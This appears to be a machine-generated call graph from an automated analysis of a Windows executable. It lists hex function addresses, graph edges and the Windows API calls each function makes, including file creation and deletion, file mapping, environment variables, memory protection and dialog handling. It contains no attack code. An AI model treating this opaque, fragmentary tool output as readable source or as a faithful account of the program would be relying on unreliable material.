63b0eb 23704 6219af 128 API calls 23701->23704 23702 63b0d9 23703 621692 86 API calls 23702->23703 23705 63b0e4 23703->23705 23707 63b10d __InternalCxxFrameHandler ___std_exception_copy 23704->23707 23705->23474 23705->23476 23706 621692 86 API calls 23706->23705 23707->23706 23708->23524 24464 63b568 PeekMessageW 23709->24464 23712 63d502 23716 63d50d ShowWindow SendMessageW SendMessageW 23712->23716 23713 63d536 SendMessageW SendMessageW 23714 63d572 23713->23714 23715 63d591 SendMessageW SendMessageW SendMessageW 23713->23715 23714->23715 23717 63d5e7 SendMessageW 23715->23717 23718 63d5c4 SendMessageW 23715->23718 23716->23713 23717->23475 23718->23717 23719->23536 23720->23564 23721->23569 23722->23574 23723->23580 23724->23587 23725->23529 23726->23535 23727->23506 23728->23494 23729->23595 23730->23592 23732 62a2bf 23731->23732 23733 62a2e3 23732->23733 23734 62a2d6 CreateDirectoryW 23732->23734 23752 62a231 23733->23752 23734->23733 23736 62a316 23734->23736 23739 62a325 23736->23739 23744 62a4ed 23736->23744 23738 62a329 GetLastError 23738->23739 23739->23601 23742 62a2ff 23742->23738 23743 62a303 CreateDirectoryW 23742->23743 23743->23736 23743->23738 23759 63ec50 23744->23759 23747 62a510 23749 62bb03 GetCurrentDirectoryW 23747->23749 23748 62a53d 23748->23739 23750 62a524 23749->23750 23750->23748 23751 62a528 SetFileAttributesW 23750->23751 23751->23748 23761 62a243 23752->23761 23755 62bb03 23756 62bb10 _wcslen 23755->23756 23757 62bbb8 GetCurrentDirectoryW 23756->23757 23758 62bb39 _wcslen 23756->23758 23757->23758 23758->23742 23760 62a4fa SetFileAttributesW 23759->23760 23760->23747 23760->23748 23762 63ec50 23761->23762 23763 62a250 GetFileAttributesW 23762->23763 23764 62a261 23763->23764 23765 62a23a 23763->23765 23766 62bb03 GetCurrentDirectoryW 23764->23766 23765->23738 23765->23755 23767 62a275 23766->23767 23767->23765 23768 62a279 GetFileAttributesW 23767->23768 23768->23765 23770 62407c __vswprintf_c_l 23769->23770 23773 645fd4 23770->23773 23776 644097 23773->23776 23777 6440d7 23776->23777 23778 6440bf 23776->23778 23777->23778 23779 6440df 23777->23779 23800 6491a8 20 API calls _abort 23778->23800 23802 644636 23779->23802 23782 6440c4 23801 649087 26 API calls __cftof 23782->23801 23787 624086 23787->23532 23788 644167 23811 6449e6 51 API calls 4 library calls 23788->23811 23791 644172 23812 6446b9 20 API calls _free 23791->23812 23792 6440cf 23793 63fbbc 23792->23793 23794 63fbc5 IsProcessorFeaturePresent 23793->23794 23795 63fbc4 23793->23795 23797 63fc07 23794->23797 23795->23787 23813 63fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23797->23813 23799 63fcea 23799->23787 23800->23782 23801->23792 23803 644653 23802->23803 23804 6440ef 23802->23804 23803->23804 23814 6497e5 GetLastError 23803->23814 23810 644601 20 API calls 2 library calls 23804->23810 23806 644674 23835 64993a 38 API calls __cftof 23806->23835 23808 64468d 23836 649967 38 API calls __cftof 23808->23836 23810->23788 23811->23791 23812->23792 23813->23799 23815 649807 23814->23815 23816 6497fb 23814->23816 23838 64b136 20 API calls 2 library calls 23815->23838 23837 64ae5b 11 API calls 2 library calls 23816->23837 23819 649813 23826 64981b 23819->23826 23845 64aeb1 11 API calls 2 library calls 23819->23845 23820 649801 23820->23815 23821 649850 SetLastError 23820->23821 23821->23806 23824 649830 23824->23826 23827 649837 23824->23827 23825 649821 23828 64985c SetLastError 23825->23828 23839 648dcc 23826->23839 23846 649649 20 API calls _abort 23827->23846 23847 648d24 38 API calls _abort 23828->23847 23831 649842 23833 648dcc _free 20 API calls 23831->23833 23834 649849 23833->23834 23834->23821 23834->23828 23835->23808 23836->23804 23837->23820 23838->23819 23840 648dd7 RtlFreeHeap 23839->23840 23844 648e00 __dosmaperr 23839->23844 23841 648dec 23840->23841 23840->23844 23848 6491a8 20 API calls _abort 23841->23848 23843 648df2 GetLastError 23843->23844 23844->23825 23845->23824 23846->23831 23848->23843 23850 629781 23849->23850 23851 629757 23849->23851 23850->23618 23851->23850 23860 62a1e0 23851->23860 23855 62962c 23854->23855 23856 62964a 23854->23856 23855->23856 23858 629638 CloseHandle 23855->23858 23857 629669 23856->23857 23868 626bd5 76 API calls 23856->23868 23857->23618 23858->23856 23861 63ec50 23860->23861 23862 62a1ed DeleteFileW 23861->23862 23863 62a200 23862->23863 23864 62977f 23862->23864 23865 62bb03 GetCurrentDirectoryW 23863->23865 23864->23618 23866 62a214 23865->23866 23866->23864 23867 62a218 DeleteFileW 23866->23867 23867->23864 23868->23857 23875 62d9b0 23869->23875 23872 62e645 SetDlgItemTextW 23872->23630 23873 62e66b LoadStringW 23873->23872 23874 62e682 LoadStringW 23873->23874 23874->23872 23880 62d8ec 23875->23880 23877 62d9cd 23879 62d9e2 23877->23879 23888 62d9f0 26 API calls 23877->23888 23879->23872 23879->23873 23881 62d904 23880->23881 23887 62d984 _strncpy 23880->23887 23883 62d928 23881->23883 23889 631da7 WideCharToMultiByte 23881->23889 23886 62d959 23883->23886 23890 62e5b1 50 API calls __vsnprintf 23883->23890 23891 646159 26 API calls 3 library calls 23886->23891 23887->23877 23888->23879 23889->23883 23890->23886 23891->23887 23893 63b31e 23892->23893 23894 63b3f0 ExpandEnvironmentStringsW 23893->23894 23895 63b40d 23893->23895 23894->23895 23895->23635 23896->23635 23897->23635 23898->23655 23899->23635 23900->23635 23901->23635 23903 648e54 23902->23903 23904 648e61 23903->23904 23905 648e6c 23903->23905 23915 648e06 23904->23915 23907 648e74 23905->23907 23913 648e7d _abort 23905->23913 23908 648dcc _free 20 API calls 23907->23908 23911 648e69 23908->23911 23909 648ea7 HeapReAlloc 23909->23911 23909->23913 23910 648e82 23922 6491a8 20 API calls _abort 23910->23922 23911->23635 23913->23909 23913->23910 23923 647a5e 7 API calls 2 library calls 23913->23923 23916 648e44 23915->23916 23920 648e14 _abort 23915->23920 23925 6491a8 20 API calls _abort 23916->23925 23918 648e2f RtlAllocateHeap 23919 648e42 23918->23919 23918->23920 23919->23911 23920->23916 23920->23918 23924 647a5e 7 API calls 2 library calls 23920->23924 23922->23911 23923->23913 23924->23920 23925->23919 23927 630666 _wcslen 23926->23927 23954 6217e9 23927->23954 23929 63067e 23929->23659 23931 630659 _wcslen 23930->23931 23932 6217e9 78 API calls 23931->23932 23933 63067e 23932->23933 23933->23661 23935 627b17 __EH_prolog 23934->23935 23971 62ce40 23935->23971 23937 627b32 23977 63eb38 23937->23977 23939 627b5c 23986 634a76 23939->23986 23942 627c7d 23943 627c87 23942->23943 23945 627cf1 23943->23945 24018 62a56d 23943->24018 23947 627d50 23945->23947 23996 628284 23945->23996 23946 627d92 23946->23665 23947->23946 24024 62138b 74 API calls 23947->24024 23951 627bac 23950->23951 23953 627bb3 23950->23953 23952 632297 86 API calls 23951->23952 23952->23953 23955 6217ff 23954->23955 23966 62185a __InternalCxxFrameHandler 23954->23966 23956 621828 23955->23956 23967 626c36 76 API calls __vswprintf_c_l 23955->23967 23958 621887 23956->23958 23959 621847 ___std_exception_copy 23956->23959 23961 643e3e 22 API calls 23958->23961 23959->23966 23969 626ca7 75 API calls 23959->23969 23960 62181e 23968 626ca7 75 API calls 23960->23968 23963 62188e 23961->23963 23963->23966 23970 626ca7 75 API calls 23963->23970 23966->23929 23967->23960 23968->23956 23969->23966 23970->23966 23972 62ce4a __EH_prolog 23971->23972 23973 63eb38 8 API calls 23972->23973 23974 62ce8d 23973->23974 23975 63eb38 8 API calls 23974->23975 23976 62ceb1 23975->23976 23976->23937 23979 63eb3d ___std_exception_copy 23977->23979 23978 63eb57 23978->23939 23979->23978 23982 63eb59 23979->23982 23992 647a5e 7 API calls 2 library calls 23979->23992 23981 63f5c9 23994 64238d RaiseException 23981->23994 23982->23981 23993 64238d RaiseException 23982->23993 23985 63f5e6 23987 634a80 __EH_prolog 23986->23987 23988 63eb38 8 API calls 23987->23988 23989 634a9c 23988->23989 23990 627b8b 23989->23990 23995 630e46 80 API calls 23989->23995 23990->23942 23992->23979 23993->23981 23994->23985 23995->23990 23997 62828e __EH_prolog 23996->23997 24025 6213dc 23997->24025 23999 6282aa 24000 6282bb 23999->24000 24165 629f42 23999->24165 24005 6282f2 24000->24005 24033 621a04 24000->24033 24003 6282ee 24003->24005 24015 62a56d 7 API calls 24003->24015 24017 628389 24003->24017 24169 62c0c5 CompareStringW _wcslen 24003->24169 24161 621692 24005->24161 24010 6283e8 24057 621f6d 24010->24057 24013 6283f3 24013->24005 24061 623b2d 24013->24061 24073 62848e 24013->24073 24015->24003 24052 628430 24017->24052 24019 62a582 24018->24019 24020 62a5b0 24019->24020 24433 62a69b 24019->24433 24020->23943 24022 62a592 24022->24020 24023 62a597 FindClose 24022->24023 24023->24020 24024->23946 24026 6213e1 __EH_prolog 24025->24026 24027 62ce40 8 API calls 24026->24027 24028 621419 24027->24028 24029 63eb38 8 API calls 24028->24029 24032 621474 __cftof 24028->24032 24030 621461 24029->24030 24030->24032 24171 62b505 24030->24171 24032->23999 24034 621a0e __EH_prolog 24033->24034 24046 621a61 24034->24046 24049 621b9b 24034->24049 24187 6213ba 24034->24187 24036 621bc7 24199 62138b 74 API calls 24036->24199 24037 621bd4 24040 623b2d 101 API calls 24037->24040 24037->24049 24041 621c12 24040->24041 24042 621c5a 24041->24042 24044 623b2d 101 API calls 24041->24044 24045 621c8d 24042->24045 24042->24049 24200 62138b 74 API calls 24042->24200 24044->24041 24045->24049 24050 629e80 79 API calls 24045->24050 24046->24036 24046->24037 24046->24049 24047 623b2d 101 API calls 24048 621cde 24047->24048 24048->24047 24048->24049 24049->24003 24050->24048 24220 62cf3d 24052->24220 24054 628440 24224 6313d2 GetSystemTime SystemTimeToFileTime 24054->24224 24056 6283a3 24056->24010 24170 631b66 72 API calls 24056->24170 24058 621f72 __EH_prolog 24057->24058 24060 621fa6 24058->24060 24229 6219af 24058->24229 24060->24013 24062 623b39 24061->24062 24063 623b3d 24061->24063 24062->24013 24072 629e80 79 API calls 24063->24072 24064 623b4f 24065 623b6a 24064->24065 24066 623b78 24064->24066 24067 623baa 24065->24067 24359 6232f7 89 API calls 2 library calls 24065->24359 24360 62286b 101 API calls 3 library calls 24066->24360 24067->24013 24070 623b76 24070->24067 24361 6220d7 74 API calls 24070->24361 24072->24064 24074 628498 __EH_prolog 24073->24074 24077 6284d5 24074->24077 24084 628513 24074->24084 24386 638c8d 103 API calls 24074->24386 24076 6284f5 24078 6284fa 24076->24078 24079 62851c 24076->24079 24077->24076 24082 62857a 24077->24082 24077->24084 24078->24084 24387 627a0d 152 API calls 24078->24387 24079->24084 24388 638c8d 103 API calls 24079->24388 24082->24084 24362 625d1a 24082->24362 24084->24013 24085 628605 24085->24084 24368 628167 24085->24368 24088 628797 24089 62a56d 7 API calls 24088->24089 24090 628802 24088->24090 24089->24090 24374 627c0d 24090->24374 24092 62d051 82 API calls 24098 62885d 24092->24098 24093 628a5f 24099 628ab6 24093->24099 24112 628a6a 24093->24112 24094 628992 24094->24093 24101 6289e1 24094->24101 24095 62898b 24391 622021 74 API calls 24095->24391 24098->24084 24098->24092 24098->24094 24098->24095 24389 628117 84 API calls 24098->24389 24390 622021 74 API calls 24098->24390 24105 628a4c 24099->24105 24394 627fc0 97 API calls 24099->24394 24100 628ab4 24106 62959a 80 API calls 24100->24106 24103 628b14 24101->24103 24101->24105 24107 62a231 3 API calls 24101->24107 24102 629105 24104 62959a 80 API calls 24102->24104 24103->24102 24121 628b82 24103->24121 24395 6298bc 24103->24395 24104->24084 24105->24100 24105->24103 24106->24084 24109 628a19 24107->24109 24109->24105 24392 6292a3 97 API calls 24109->24392 24110 62ab1a 8 API calls 24113 628bd1 24110->24113 24112->24100 24393 627db2 101 API calls 24112->24393 24116 62ab1a 8 API calls 24113->24116 24133 628be7 24116->24133 24119 628b70 24399 626e98 77 API calls 24119->24399 24121->24110 24122 628cbc 24123 628e40 24122->24123 24124 628d18 24122->24124 24126 628e52 24123->24126 24127 628e66 24123->24127 24147 628d49 24123->24147 24125 628d8a 24124->24125 24128 628d28 24124->24128 24135 628167 19 API calls 24125->24135 24129 629215 123 API calls 24126->24129 24130 633377 75 API calls 24127->24130 24131 628d6e 24128->24131 24139 628d37 24128->24139 24129->24147 24132 628e7f 24130->24132 24131->24147 24402 6277b8 111 API calls 24131->24402 24405 633020 123 API calls 24132->24405 24133->24122 24134 628c93 24133->24134 24142 62981a 79 API calls 24133->24142 24134->24122 24400 629a3c 82 API calls 24134->24400 24140 628dbd 24135->24140 24401 622021 74 API calls 24139->24401 24143 628de6 24140->24143 24144 628df5 24140->24144 24140->24147 24142->24134 24403 627542 85 API calls 24143->24403 24404 629155 93 API calls __EH_prolog 24144->24404 24150 628f85 24147->24150 24406 622021 74 API calls 24147->24406 24149 629090 24149->24102 24152 62a4ed 3 API calls 24149->24152 24150->24102 24150->24149 24151 62903e 24150->24151 24380 629f09 SetEndOfFile 24150->24380 24381 629da2 24151->24381 24153 6290eb 24152->24153 24153->24102 24407 622021 74 API calls 24153->24407 24156 629085 24157 629620 77 API calls 24156->24157 24157->24149 24159 6290fb 24408 626dcb 76 API calls _wcschr 24159->24408 24162 6216a4 24161->24162 24424 62cee1 24162->24424 24166 629f59 24165->24166 24167 629f63 24166->24167 24432 626d0c 78 API calls 24166->24432 24167->24000 24169->24003 24170->24010 24172 62b50f __EH_prolog 24171->24172 24177 62f1d0 82 API calls 24172->24177 24174 62b521 24178 62b61e 24174->24178 24177->24174 24179 62b630 __cftof 24178->24179 24182 6310dc 24179->24182 24185 63109e GetCurrentProcess GetProcessAffinityMask 24182->24185 24186 62b597 24185->24186 24186->24032 24201 621732 24187->24201 24189 6213d6 24190 629e80 24189->24190 24191 629e92 24190->24191 24195 629ea5 24190->24195 24193 629eb0 24191->24193 24218 626d5b 77 API calls 24191->24218 24193->24046 24194 629eb8 SetFilePointer 24194->24193 24196 629ed4 GetLastError 24194->24196 24195->24193 24195->24194 24196->24193 24197 629ede 24196->24197 24197->24193 24219 626d5b 77 API calls 24197->24219 24199->24049 24200->24045 24202 621748 24201->24202 24213 6217a0 __InternalCxxFrameHandler 24201->24213 24203 621771 24202->24203 24214 626c36 76 API calls __vswprintf_c_l 24202->24214 24204 6217c7 24203->24204 24210 62178d ___std_exception_copy 24203->24210 24207 643e3e 22 API calls 24204->24207 24206 621767 24215 626ca7 75 API calls 24206->24215 24208 6217ce 24207->24208 24208->24213 24217 626ca7 75 API calls 24208->24217 24210->24213 24216 626ca7 75 API calls 24210->24216 24213->24189 24214->24206 24215->24203 24216->24213 24217->24213 24218->24195 24219->24193 24221 62cf4d 24220->24221 24223 62cf54 24220->24223 24225 62981a 24221->24225 24223->24054 24224->24056 24226 629833 24225->24226 24228 629e80 79 API calls 24226->24228 24227 629865 24227->24223 24228->24227 24230 6219bf 24229->24230 24232 6219bb 24229->24232 24233 6218f6 24230->24233 24232->24060 24234 621908 24233->24234 24235 621945 24233->24235 24236 623b2d 101 API calls 24234->24236 24241 623fa3 24235->24241 24237 621928 24236->24237 24237->24232 24245 623fac 24241->24245 24242 623b2d 101 API calls 24242->24245 24243 621966 24243->24237 24246 621e50 24243->24246 24245->24242 24245->24243 24258 630e08 24245->24258 24247 621e5a __EH_prolog 24246->24247 24266 623bba 24247->24266 24249 621e84 24250 621732 78 API calls 24249->24250 24252 621f0b 24249->24252 24251 621e9b 24250->24251 24294 6218a9 78 API calls 24251->24294 24252->24237 24254 621eb3 24256 621ebf _wcslen 24254->24256 24295 631b84 MultiByteToWideChar 24254->24295 24296 6218a9 78 API calls 24256->24296 24259 630e0f 24258->24259 24260 630e2a 24259->24260 24264 626c31 RaiseException _com_raise_error 24259->24264 24262 630e3b SetThreadExecutionState 24260->24262 24265 626c31 RaiseException _com_raise_error 24260->24265 24262->24245 24264->24260 24265->24262 24267 623bc4 __EH_prolog 24266->24267 24268 623bf6 24267->24268 24269 623bda 24267->24269 24271 623e51 24268->24271 24274 623c22 24268->24274 24322 62138b 74 API calls 24269->24322 24339 62138b 74 API calls 24271->24339 24273 623be5 24273->24249 24274->24273 24297 633377 24274->24297 24276 623ca3 24278 623d2e 24276->24278 24293 623c9a 24276->24293 24325 62d051 24276->24325 24277 623c9f 24277->24276 24324 6220bd 78 API calls 24277->24324 24307 62ab1a 24278->24307 24280 623c71 24280->24276 24280->24277 24281 623c8f 24280->24281 24323 62138b 74 API calls 24281->24323 24282 623d41 24287 623dd7 24282->24287 24288 623dc7 24282->24288 24331 633020 123 API calls 24287->24331 24311 629215 24288->24311 24291 623dd5 24291->24293 24332 622021 74 API calls 24291->24332 24333 632297 24293->24333 24294->24254 24295->24256 24296->24252 24298 63338c 24297->24298 24300 633396 ___std_exception_copy 24297->24300 24340 626ca7 75 API calls 24298->24340 24301 6334c6 24300->24301 24302 63341c 24300->24302 24306 633440 __cftof 24300->24306 24342 64238d RaiseException 24301->24342 24341 6332aa 75 API calls 3 library calls 24302->24341 24305 6334f2 24306->24280 24308 62ab28 24307->24308 24310 62ab32 24307->24310 24309 63eb38 8 API calls 24308->24309 24309->24310 24310->24282 24312 62921f __EH_prolog 24311->24312 24343 627c64 24312->24343 24315 6213ba 78 API calls 24316 629231 24315->24316 24346 62d114 24316->24346 24318 62928a 24318->24291 24320 62d114 118 API calls 24321 629243 24320->24321 24321->24318 24321->24320 24355 62d300 97 API calls __InternalCxxFrameHandler 24321->24355 24322->24273 24323->24293 24324->24276 24326 62d072 24325->24326 24327 62d084 24325->24327 24356 62603a 82 API calls 24326->24356 24357 62603a 82 API calls 24327->24357 24330 62d07c 24330->24278 24331->24291 24332->24293 24335 6322a1 24333->24335 24334 6322ba 24358 630eed 86 API calls 24334->24358 24335->24334 24338 6322ce 24335->24338 24337 6322c1 24337->24338 24339->24273 24340->24300 24341->24306 24342->24305 24344 62b146 GetVersionExW 24343->24344 24345 627c69 24344->24345 24345->24315 24353 62d12a __InternalCxxFrameHandler 24346->24353 24347 62d29a 24348 62d2ce 24347->24348 24349 62d0cb 6 API calls 24347->24349 24350 630e08 SetThreadExecutionState RaiseException 24348->24350 24349->24348 24352 62d291 24350->24352 24351 638c8d 103 API calls 24351->24353 24352->24321 24353->24347 24353->24351 24353->24352 24354 62ac05 91 API calls 24353->24354 24354->24353 24355->24321 24356->24330 24357->24330 24358->24337 24359->24070 24360->24070 24361->24067 24363 625d2a 24362->24363 24409 625c4b 24363->24409 24366 625d5d 24367 625d95 24366->24367 24414 62b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24366->24414 24367->24085 24369 628186 24368->24369 24370 628232 24369->24370 24421 62be5e 19 API calls __InternalCxxFrameHandler 24369->24421 24420 631fac CharUpperW 24370->24420 24373 62823b 24373->24088 24375 627c22 24374->24375 24376 627c5a 24375->24376 24422 626e7a 74 API calls 24375->24422 24376->24098 24378 627c52 24423 62138b 74 API calls 24378->24423 24380->24151 24382 629dc2 24381->24382 24383 629db3 24381->24383 24385 629e3f SetFileTime 24382->24385 24383->24382 24384 629db9 FlushFileBuffers 24383->24384 24384->24382 24385->24156 24386->24077 24387->24084 24388->24084 24389->24098 24390->24098 24391->24094 24392->24105 24393->24100 24394->24105 24396 6298c5 GetFileType 24395->24396 24397 628b5a 24395->24397 24396->24397 24397->24121 24398 622021 74 API calls 24397->24398 24398->24119 24399->24121 24400->24122 24401->24147 24402->24147 24403->24147 24404->24147 24405->24147 24406->24150 24407->24159 24408->24102 24415 625b48 24409->24415 24412 625b48 2 API calls 24413 625c6c 24412->24413 24413->24366 24414->24366 24418 625b52 24415->24418 24416 625c3a 24416->24412 24416->24413 24418->24416 24419 62b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24418->24419 24419->24418 24420->24373 24421->24370 24422->24378 24423->24376 24425 62cef2 24424->24425 24430 62a99e 86 API calls 24425->24430 24427 62cf24 24431 62a99e 86 API calls 24427->24431 24429 62cf2f 24430->24427 24431->24429 24432->24167 24434 62a6a8 24433->24434 24435 62a6c1 FindFirstFileW 24434->24435 24436 62a727 FindNextFileW 24434->24436 24438 62a6d0 24435->24438 24443 62a709 24435->24443 24437 62a732 GetLastError 24436->24437 24436->24443 24437->24443 24439 62bb03 GetCurrentDirectoryW 24438->24439 24440 62a6e0 24439->24440 24441 62a6e4 FindFirstFileW 24440->24441 24442 62a6fe GetLastError 24440->24442 24441->24442 24441->24443 24442->24443 24443->24022 24453 63a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24444->24453 24446 63a5cd 24448 63a5d9 24446->24448 24454 63a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24446->24454 24448->23672 24448->23674 24449->23673 24450->23682 24451->23682 24452->23685 24453->24446 24454->24448 24455->23693 24457 629f42 78 API calls 24456->24457 24458 621fe8 24457->24458 24459 621a04 101 API calls 24458->24459 24462 622005 24458->24462 24460 621ff5 24459->24460 24460->24462 24463 62138b 74 API calls 24460->24463 24462->23701 24462->23702 24463->24462 24465 63b583 GetMessageW 24464->24465 24466 63b5bc GetDlgItem 24464->24466 24467 63b599 IsDialogMessageW 24465->24467 24468 63b5a8 TranslateMessage DispatchMessageW 24465->24468 24466->23712 24466->23713 24467->24466 24467->24468 24468->24466 24469 6213e1 84 API calls 2 library calls 25327 6394e0 GetClientRect 25328 63f2e0 46 API calls __RTC_Initialize 25373 6321e0 26 API calls std::bad_exception::bad_exception 24470 63eae7 24471 63eaf1 24470->24471 24474 63e85d 24471->24474 24500 63e5bb 24474->24500 24476 63e86d 24477 63e8ca 24476->24477 24494 63e8ee 24476->24494 24478 63e7fb DloadReleaseSectionWriteAccess 6 API calls 24477->24478 24479 63e8d5 RaiseException 24478->24479 24495 63eac3 24479->24495 24480 63e966 LoadLibraryExA 24481 63e9c7 24480->24481 24482 63e979 GetLastError 24480->24482 24483 63e9d2 FreeLibrary 24481->24483 24484 63e9d9 24481->24484 24485 63e9a2 24482->24485 24486 63e98c 24482->24486 24483->24484 24487 63ea37 GetProcAddress 24484->24487 24488 63ea95 24484->24488 24490 63e7fb DloadReleaseSectionWriteAccess 6 API calls 24485->24490 24486->24481 24486->24485 24487->24488 24489 63ea47 GetLastError 24487->24489 24509 63e7fb 24488->24509 24492 63ea5a 24489->24492 24491 63e9ad RaiseException 24490->24491 24491->24495 24492->24488 24496 63e7fb DloadReleaseSectionWriteAccess 6 API calls 24492->24496 24494->24480 24494->24481 24494->24484 24494->24488 24497 63ea7b RaiseException 24496->24497 24498 63e5bb ___delayLoadHelper2@8 6 API calls 24497->24498 24499 63ea92 24498->24499 24499->24488 24501 63e5c7 24500->24501 24502 63e5ed 24500->24502 24517 63e664 24501->24517 24502->24476 24504 63e5cc 24505 63e5e8 24504->24505 24520 63e78d 24504->24520 24525 63e5ee GetModuleHandleW GetProcAddress GetProcAddress 24505->24525 24508 63e836 24508->24476 24510 63e82f 24509->24510 24511 63e80d 24509->24511 24510->24495 24512 63e664 DloadReleaseSectionWriteAccess 3 API calls 24511->24512 24513 63e812 24512->24513 24514 63e82a 24513->24514 24515 63e78d DloadProtectSection 3 API calls 24513->24515 24528 63e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24514->24528 24515->24514 24526 63e5ee GetModuleHandleW GetProcAddress GetProcAddress 24517->24526 24519 63e669 24519->24504 24523 63e7a2 DloadProtectSection 24520->24523 24521 63e7a8 24521->24505 24522 63e7dd VirtualProtect 24522->24521 24523->24521 24523->24522 24527 63e6a3 VirtualQuery GetSystemInfo 24523->24527 24525->24508 24526->24519 24527->24522 24528->24510 25329 63f4e7 29 API calls _abort 25330 64bee0 GetCommandLineA GetCommandLineW 25374 62f1e8 FreeLibrary 25331 625ef0 82 API calls 25376 6295f0 80 API calls 25377 63fd4f 9 API calls 2 library calls 24537 6498f0 24545 64adaf 24537->24545 24540 649904 24542 64990c 24543 649919 24542->24543 24553 649920 11 API calls 24542->24553 24554 64ac98 24545->24554 24548 64adee TlsAlloc 24549 64addf 24548->24549 24550 63fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24549->24550 24551 6498fa 24550->24551 24551->24540 24552 649869 20 API calls 2 library calls 24551->24552 24552->24542 24553->24540 24555 64acc4 24554->24555 24556 64acc8 24554->24556 24555->24556 24559 64ace8 24555->24559 24561 64ad34 24555->24561 24556->24548 24556->24549 24558 64acf4 GetProcAddress 24560 64ad04 _abort 24558->24560 24559->24556 24559->24558 24560->24556 24562 64ad55 LoadLibraryExW 24561->24562 24563 64ad4a 24561->24563 24564 64ad72 GetLastError 24562->24564 24566 64ad8a 24562->24566 24563->24555 24565 64ad7d LoadLibraryExW 24564->24565 24564->24566 24565->24566 24566->24563 24567 64ada1 FreeLibrary 24566->24567 24567->24563 24568 64abf0 24569 64abfb 24568->24569 24571 64ac24 24569->24571 24572 64ac20 24569->24572 24574 64af0a 24569->24574 24581 64ac50 DeleteCriticalSection 24571->24581 24575 64ac98 _abort 5 API calls 24574->24575 24576 64af31 24575->24576 24577 64af4f InitializeCriticalSectionAndSpinCount 24576->24577 24580 64af3a 24576->24580 24577->24580 24578 63fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24579 64af66 24578->24579 24579->24569 24580->24578 24581->24572 25332 6488f0 7 API calls ___scrt_uninitialize_crt 25334 642cfb 38 API calls 4 library calls 24605 63dec2 24606 63decf 24605->24606 24607 62e617 53 API calls 24606->24607 24608 63dedc 24607->24608 24609 624092 _swprintf 51 API calls 24608->24609 24610 63def1 SetDlgItemTextW 24609->24610 24611 63b568 5 API calls 24610->24611 24612 63df0e 24611->24612 25379 63b5c0 100 API calls 25380 6377c0 118 API calls 25381 63ffc0 RaiseException _com_raise_error _com_error::_com_error 25336 6362ca 123 API calls __InternalCxxFrameHandler 25338 63f4d3 20 API calls 24621 63e1d1 14 API calls ___delayLoadHelper2@8 24623 63e2d7 24624 63e1db 24623->24624 24625 63e85d ___delayLoadHelper2@8 14 API calls 24624->24625 24625->24624 25384 64a3d0 21 API calls 2 library calls 25385 652bd0 VariantClear 24627 6210d5 24632 625abd 24627->24632 24633 625ac7 __EH_prolog 24632->24633 24634 62b505 84 API calls 24633->24634 24635 625ad3 24634->24635 24639 625cac GetCurrentProcess GetProcessAffinityMask 24635->24639 25340 640ada 51 API calls 2 library calls 25341 63dca1 DialogBoxParamW 25386 63f3a0 27 API calls 25344 64a4a0 71 API calls _free 25345 64a6a0 31 API calls 2 library calls 25387 63eda7 48 API calls _unexpected 25346 6508a0 IsProcessorFeaturePresent 25388 626faa 111 API calls 3 library calls 24713 63f3b2 24714 63f3be ___scrt_is_nonwritable_in_current_image 24713->24714 24745 63eed7 24714->24745 24716 63f3c5 24717 63f518 24716->24717 24720 63f3ef 24716->24720 24818 63f838 4 API calls 2 library calls 24717->24818 24719 63f51f 24811 647f58 24719->24811 24733 63f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24720->24733 24756 648aed 24720->24756 24727 63f40e 24729 63f48f 24764 63f953 GetStartupInfoW __cftof 24729->24764 24731 63f495 24765 648a3e 51 API calls 24731->24765 24733->24729 24814 647af4 38 API calls _abort 24733->24814 24735 63f49d 24766 63df1e 24735->24766 24739 63f4b1 24739->24719 24740 63f4b5 24739->24740 24741 63f4be 24740->24741 24816 647efb 28 API calls _abort 24740->24816 24817 63f048 12 API calls ___scrt_uninitialize_crt 24741->24817 24744 63f4c6 24744->24727 24746 63eee0 24745->24746 24820 63f654 IsProcessorFeaturePresent 24746->24820 24748 63eeec 24821 642a5e 24748->24821 24750 63eef1 24755 63eef5 24750->24755 24829 648977 24750->24829 24753 63ef0c 24753->24716 24755->24716 24757 648b04 24756->24757 24758 63fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24757->24758 24759 63f408 24758->24759 24759->24727 24760 648a91 24759->24760 24761 648ac0 24760->24761 24762 63fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24761->24762 24763 648ae9 24762->24763 24763->24733 24764->24731 24765->24735 24880 630863 24766->24880 24770 63df3d 24929 63ac16 24770->24929 24772 63df46 __cftof 24773 63df59 GetCommandLineW 24772->24773 24774 63dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24773->24774 24775 63df68 24773->24775 24776 624092 _swprintf 51 API calls 24774->24776 24933 63c5c4 24775->24933 24778 63e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24776->24778 24944 63b6dd LoadBitmapW 24778->24944 24781 63dfe0 24938 63dbde 24781->24938 24782 63df76 OpenFileMappingW 24785 63dfd6 CloseHandle 24782->24785 24786 63df8f MapViewOfFile 24782->24786 24785->24774 24788 63dfa0 __InternalCxxFrameHandler 24786->24788 24789 63dfcd UnmapViewOfFile 24786->24789 24793 63dbde 2 API calls 24788->24793 24789->24785 24795 63dfbc 24793->24795 24794 6390b7 8 API calls 24796 63e0aa DialogBoxParamW 24794->24796 24795->24789 24797 63e0e4 24796->24797 24798 63e0f6 Sleep 24797->24798 24799 63e0fd 24797->24799 24798->24799 24801 63e10b 24799->24801 24974 63ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 24799->24974 24802 63e12a DeleteObject 24801->24802 24803 63e146 24802->24803 24804 63e13f DeleteObject 24802->24804 24805 63e177 24803->24805 24806 63e189 24803->24806 24804->24803 24975 63dc3b 6 API calls 24805->24975 24971 63ac7c 24806->24971 24808 63e17d CloseHandle 24808->24806 24810 63e1c3 24815 63f993 GetModuleHandleW 24810->24815 25105 647cd5 24811->25105 24814->24729 24815->24739 24816->24741 24817->24744 24818->24719 24820->24748 24833 643b07 24821->24833 24824 642a67 